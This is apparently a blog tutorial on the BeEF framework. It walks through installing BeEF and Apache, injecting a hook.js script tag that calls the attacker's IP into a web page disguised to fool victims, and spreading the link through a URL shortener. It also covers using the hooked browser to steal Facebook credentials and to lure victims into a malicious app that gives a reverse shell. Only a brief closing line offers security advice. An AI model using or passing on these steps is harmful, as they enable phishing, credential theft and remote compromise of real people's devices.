Hacking Device’s using Webpage
We’ve been seeing about various attacks done by attackers (Hacker’s) using malicious webpages.
How do these attackers do these kinds of attacks? Let’s see how these are performed, and how to be secure.
Requirements :
- Linux (Kali Linux preferred)
Tools:
- BeEF Framework
- Apache server
Installation:
- Generally, Kali Linux comes with BeEF Framework as a pre-installed tool.
If you are using any other Linux or the tool is missing we could install.
If the tool is installed by default we could start it by:
>cd /usr/share/beef-xss
>./beef
If the tool is not installed we will install it by using the following commands:
Prerequisites:
BeEF requires Ruby 2.3 (or newer). Refer to your operating system documentation for instructions to install the latest stable version of Ruby.
# Debian based systems
sudo apt-get install ruby ruby-dev# RedHat / Fedora
sudo yum install ruby ruby-devel
If your operating system package manager does not support Ruby version 2.3 (or newer), you can add the brightbox ppa repository for the latest version of Ruby:
$ sudo apt-add-repository -y ppa:brightbox/ruby-ng
Downloading:
$ git clone https://github.com/beefproject/beef
Installing:
Go into the downloaded folder and execute the following command
$ ./install
Start BeEF:
To start BeEF, simply run:
$ ./beef
2. To install the Apache server Enter the following command in your command shell
>sudo apt-get install apache2
Configuring:
- In the beef directory, you are in edit the “config.yml” file. Change the username and password if needed(optional).
- now by running “./beef”, the beef framework starts. As shown using the URL for UI panel for the attacker(i.e for us) to view beef framework.
3. Now go to your browser and visit the link which gets you the panel. Enter the username and password you changed and log in (if not changed the default username and password is username: beef, password: beef.
4. Now start the Apache server by using the following command in your terminal
>service apache2 start
Now as the service is active we need to configure&customize our HTML page.
We customize the page as required for the victim to be fooled. The HTML file is located in the following location.
And enter the following script in your HTML file
>cd /var/www/html/
>nano index.html
(customized your HTML page as required and add the following line in your code)
<script src = “http://<ip-address>/hook.js” type = “text/javascript”></script>
(replace with your hooking address)
I’ve made my simple HTML page for the demo
Attack
- After all the setup is done we will proceed with the attack.
Send your IP address to the victim either by converting it as DNS or by shortening the URL using “ https://tinyurl.com/” and send it to the victim. - When the victim opens the URL you will get the details of the victim’s device. In this case, I will be using a mobile.
3. Now lets head to the command section and see about our various possible attacks
4. Let’s make an alert on the mobile stating “you are hacked.”
5. Another example we will see how to get facebook credentials
6. Now we have taken what we need. So as we could see this is one of the methods to attack the victim. we could also prompt him and make him install a malicious app and we could get their reverse shell
7. This not only works on mobile but also on PCs.
Conclusion
So as we see the attacker (Hacker) could get any information he could get with petty trick’s.
So to be secure don’t visit any unsecured web-portals and log in your credentials which leads to these kinds of attacks.
(For other tutorials in BeEf please comment)